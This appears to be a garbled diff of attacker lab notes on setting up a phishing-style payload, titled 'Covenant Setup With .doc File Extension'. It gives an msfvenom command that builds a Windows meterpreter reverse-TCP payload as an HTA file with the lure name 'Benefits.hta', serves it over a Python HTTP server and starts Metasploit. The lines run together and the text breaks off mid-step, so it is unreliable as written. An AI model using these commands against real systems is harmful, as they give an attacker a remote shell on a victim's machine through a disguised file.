Covenant Setup With .doc File Extension - Microsoft Word on Host

 - On kali host:

-msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 -f hta-psh -o Benefits.hta
+msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 -f hta-psh -o Benefits.hta- Transfer

-over to Windows host-machinepython3 -m http.server 80
+Benefits.htaover to Windows host-machinepython3 -m http.server 80- On Windows host-machine browse to:

 - Start Metasploit: